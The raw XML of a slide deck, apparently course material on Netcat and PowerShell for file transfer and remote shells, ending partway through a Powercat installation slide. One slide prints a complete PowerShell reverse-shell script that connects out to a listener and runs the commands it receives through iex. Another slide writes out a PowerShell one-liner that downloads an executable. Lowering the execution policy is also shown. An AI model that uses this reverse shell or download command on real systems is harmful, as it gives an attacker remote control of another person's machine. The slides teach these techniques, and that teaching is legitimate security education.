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7"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId15"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="257" r:id="rId5"/>
    <p:sldId id="262" r:id="rId6"/>
    <p:sldId id="263" r:id="rId8"/>
    <p:sldId id="264" r:id="rId9"/>
    <p:sldId id="265" r:id="rId10"/>
    <p:sldId id="266" r:id="rId11"/>
    <p:sldId id="267" r:id="rId12"/>
    <p:sldId id="268" r:id="rId13"/>
    <p:sldId id="269"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atin typeface="Droid Sans Fallback" panose="020B0502000000000001" charset="-122"/>
                <a:ea typeface="Droid Sans Fallback" panose="020B0502000000000001" charset="-122"/>
                <a:cs typeface="DejaVu Sans" panose="020B0603030804020204" charset="0"/>
              </a:defRPr>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atin typeface="Droid Sans Fallback" panose="020B0502000000000001" charset="-122"/>
                <a:ea typeface="Droid Sans Fallback" panose="020B0502000000000001" charset="-122"/>
                <a:cs typeface="DejaVu Sans" panose="020B0603030804020204" charset="0"/>
              </a:defRPr>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atin typeface="Droid Sans Fallback" panose="020B0502000000000001" charset="-122"/>
                <a:ea typeface="Droid Sans Fallback" panose="020B0502000000000001" charset="-122"/>
                <a:cs typeface="DejaVu Sans" panose="020B0603030804020204" charset="0"/>
              </a:defRPr>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atin typeface="Droid Sans Fallback" panose="020B0502000000000001" charset="-122"/>
                <a:ea typeface="Droid Sans Fallback" panose="020B0502000000000001" charset="-122"/>
                <a:cs typeface="DejaVu Sans" panose="020B0603030804020204" charset="0"/>
              </a:defRPr>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1pPr>
    <a:lvl2pPr marL="4572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2pPr>
    <a:lvl3pPr marL="9144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3pPr>
    <a:lvl4pPr marL="13716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4pPr>
    <a:lvl5pPr marL="18288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true"/>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true" noChangeArrowheads="true"/>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true"/>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true" noChangeArrowheads="true"/>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true"/>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true" noChangeArrowheads="true"/>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4.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6.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true"/>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zh-CN" altLang="en-US"/>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true"/>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zh-CN" altLang="en-US"/>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80604020202020204" pitchFamily="34" charset="0"/>
          <a:ea typeface="SimSun" pitchFamily="2" charset="-122"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3600">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="Arial" panose="02080604020202020204" pitchFamily="34" charset="0"/>
          <a:ea typeface="SimSun" pitchFamily="2" charset="-122"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3600">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="Arial" panose="02080604020202020204" pitchFamily="34" charset="0"/>
          <a:ea typeface="SimSun" pitchFamily="2" charset="-122"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr algn="l"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true"/>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zh-CN" altLang="en-US"/>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NETCAT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" alt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pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="Screenshot from 2020-08-11 18-05-05"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3073400" y="1635125"/>
            <a:ext cx="6543675" cy="971550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Box 8"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="438150" y="1994535"/>
            <a:ext cx="1421130" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SERVER</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text Box 9"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="3594735"/>
            <a:ext cx="1345565" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CLIENT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10" descr="Screenshot from 2020-08-11 18-14-14"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3240405" y="3314700"/>
            <a:ext cx="4410075" cy="1704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NETCAT FILE TRANSFER</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" alt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sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Box 8"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="549910" y="1994535"/>
            <a:ext cx="1421130" cy="398780"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SERVER</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text Box 9"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="3594735"/>
            <a:ext cx="2570480" cy="706755"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CLIENT (Downloading file)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3180080" y="1394460"/>
            <a:ext cx="5972175" cy="1152525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3208020" y="3505200"/>
            <a:ext cx="5527675" cy="6165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NETCAT CMD</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" alt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sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Box 8"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="438150" y="1994535"/>
            <a:ext cx="1421130" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SERVER</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text Box 9"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="3594735"/>
            <a:ext cx="1345565" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CLIENT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3054350" y="1378585"/>
            <a:ext cx="5524500" cy="1076325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136900" y="3057525"/>
            <a:ext cx="4572000" cy="2343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POWERSHELL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1654810" y="1518285"/>
            <a:ext cx="7819390" cy="2541905"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Box 4"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3251200" y="3166110"/>
            <a:ext cx="309880" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="non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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>POWERSHELL File transfer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="true"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="349885" y="2757170"/>
            <a:ext cx="10972800" cy="2242185"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="false"/>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ltLang="en-US" sz="1600">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>First, we used the -c option. This will execute the supplied command (wrapped in double-quotes) as if it were typed at the PowerShell prompt.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>In this case, we are creating an instance of the WebClient class, which is defined and implemented in the System.Net namespace. The WebC/ient class is used to access resources identified by a URI and it exposes a public method called DownloadFile, which requires our two key parameters: a source location</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323850" y="1510030"/>
            <a:ext cx="11242040" cy="880110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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Text Box 9"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="267970" y="1561465"/>
            <a:ext cx="11443335" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>C:\Users\IEUser&gt;powershell -c "(new-object System.Net.WebClient).DownloadFile('https://download.avastbrowser.com/filehippo/avast_secure_browser_setup.exe' ,'C:\Users\IEUser\Desktop\abc.exe')"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="12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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>PowerShell Reverse Shell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="true"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="191135" y="901700"/>
            <a:ext cx="11831320" cy="5300345"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="false"/>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ltLang="en-US" sz="1400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>First, we will set up a simple Netcat listener on Alice's computer     (right image)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>----------------------------------------------------------------------------------------------------------------</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Next, we will send a PowerShell reverse shell from Bob's computer. Again, this is not syntactically as clean as Netcat or socat, but since PowerShell is native on most modem Windows machines, it is important that we explore this PowerShell equivalent. (below)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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pPr lvl="3"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>First, we see a client variable, which is assigned the target IP address, a stream variable, a byte array called bytes, and a while loop followed by a call to close the client connection. Within the while loop, we can see several lines responsible for reading and writing data to the network stream. Note that the iex ("/nvoke- Expression") cmdlet is a key part of this code chunk as it runs any string it receives as a command and the results of the command are then redirected and sent back via the data stream.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7658735" y="765175"/>
            <a:ext cx="4150360" cy="546100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rounded Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="382905" y="2107565"/>
            <a:ext cx="11252200" cy="2882265"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">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Text Box 8"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="509905" y="2132330"/>
            <a:ext cx="10858500" cy="2891790"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>$client = New-Object System.Net.Sockets.TCPClient('l0.ll.0.4' ,443);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>$stream = $client.GetStream();</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>[byte[]]$bytes = 0 .. 655351%{0};</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>$sendback = (iex $data 2&gt;&amp;1 I Out-String );</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>$sendback2 = $sendback + 'PS ' + (pwd).Path + '&gt; ';</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>$stream.Write($sendbyte,0,$sendbyte.Length);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>$stream.Flush();</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>$client.Close();</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="14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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Powercat Installation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rounded Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="330200" y="2092960"/>
            <a:ext cx="11252200" cy="2882265"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">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7" name="Text Box 6"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2427605"/>
            <a:ext cx="10506710" cy="1476375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="02080604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Get-ExecutionPolicy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="02080604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Set-ExecutionPolicy Unrestricted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>-scope CurrentUser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(scope OPTIONAL) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="02080604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
